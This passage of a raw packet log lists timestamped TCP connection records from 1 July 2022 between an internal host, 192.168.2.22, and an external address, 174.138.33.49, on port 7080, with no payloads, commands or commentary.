Jul 1, 2022 11:38:28.303677082 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.303740025 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.303772926 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.303797007 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.303821087 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.303843975 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.303870916 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.303879976 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.303899050 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.303920031 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.303925037 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.303927898 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.303929090 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.303932905 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.303956032 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.303972960 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.303992033 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.304316044 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.405402899 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.405478954 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.405507088 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.405531883 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.405558109 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.405572891 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.405585051 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.405608892 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.405611038 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.405613899 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.405617952 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.405638933 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.405668020 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.405678988 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.405694962 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.405699968 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.405718088 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.405721903 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.405734062 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.405750036 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.405757904 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.405775070 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.405797005 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.405808926 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.405818939 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.405822992 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.406240940 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.406260014 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.407011986 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.407052994 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.407078981 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.407103062 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.407103062 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.407120943 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.407130957 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.407166004 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.507365942 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.507405996 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.507431984 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.507493019 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.507520914 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.507590055 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.507618904 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.507641077 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.507653952 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.507666111 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.507667065 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.507693052 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.507716894 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.507728100 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.507740974 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.507750034 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.507766008 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.507797956 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.507909060 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.508088112 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.508138895 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.508140087 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.508172035 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.508199930 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.508205891 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.508228064 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.508255959 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.508263111 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.508284092 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.508313894 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.508320093 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.508342028 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.508369923 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.508374929 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.508399010 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.508424997 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.508434057 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.508452892 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.508491039 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.508507967 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.508538008 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.508543015 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.508584023 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.508621931 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.508627892 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.508661985 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.508690119 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.508696079 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.508712053 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.508721113 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.508723974 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.508747101 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.508774996 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.508783102 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.508804083 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.508830070 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.508838892 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.508858919 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.508862972 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.508886099 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.508913994 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.508924007 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.508943081 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.508955956 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.508975983 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.527997971 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.553610086 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.615274906 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.615334988 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.615354061 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.615372896 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.615385056 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.615412951 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.615412951 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.615448952 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.615452051 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.615493059 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.615533113 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.615534067 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.615572929 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.615614891 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.615616083 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.615653038 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.615686893 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.615690947 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.615730047 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.615765095 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.615767956 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.615802050 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.615839005 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.615839958 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.615880013 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.615916014 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.615920067 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.615957975 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.615967035 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.615993023 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.615995884 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.616030931 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.616036892 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.616079092 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.616095066 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.616111040 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.616118908 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.616132975 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.616161108 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.616161108 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.616194010 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.616202116 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.616245985 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.616281033 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.616286993 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.616326094 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.616327047 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.616363049 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.616369009 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.616395950 CEST | 7080 | 49175 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.616449118 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.616544008 CEST | 49175 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.625098944 CEST | 49178 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.667345047 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.726247072 CEST | 7080 | 49178 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.726402998 CEST | 49178 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.727493048 CEST | 49178 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.828512907 CEST | 7080 | 49178 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.857382059 CEST | 7080 | 49178 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.857422113 CEST | 7080 | 49178 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.857527971 CEST | 49178 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.859119892 CEST | 49178 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.871800900 CEST | 49178 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:28.977381945 CEST | 7080 | 49178 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:28.977582932 CEST | 49178 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.181118011 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.181159019 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.181173086 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.181186914 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.181201935 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.181216002 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.181229115 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.181242943 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.181257010 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.181271076 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.181411982 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.181894064 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.282896996 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.282967091 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.283015013 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.283030033 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.283056021 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.283058882 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.283087015 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.283097982 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.283102036 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.283142090 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.283152103 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.283185005 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.283226967 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.283229113 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.283278942 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.283318996 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.283324003 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.283361912 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.283401012 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.283409119 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.283442974 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.283484936 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.283488035 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.283519983 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.283560991 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.283917904 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.284784079 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.284853935 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.284890890 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.284919977 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.284931898 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.284933090 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.284974098 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.285022974 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.296258926 CEST | 49178 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.384690046 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.384764910 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.384776115 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.384808064 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.384845972 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.384856939 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.384891033 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.384895086 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.384929895 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.384934902 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.384973049 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.384987116 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.385032892 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.385044098 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.385087967 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.385092020 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.385132074 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.385137081 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.385196924 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.385246038 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.385251999 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.385297060 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.385298014 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.385334969 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.385339975 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.385373116 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.385377884 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.385411978 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.385447025 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.385462999 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.385482073 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.385484934 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.385524035 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.385572910 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.385579109 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.385634899 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.385679960 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
Jul 1, 2022 11:38:29.385683060 CEST | 49177 | 7080 | 192.168.2.22 | 174.138.33.49 |
Jul 1, 2022 11:38:29.385719061 CEST | 7080 | 49177 | 174.138.33.49 | 192.168.2.22 |
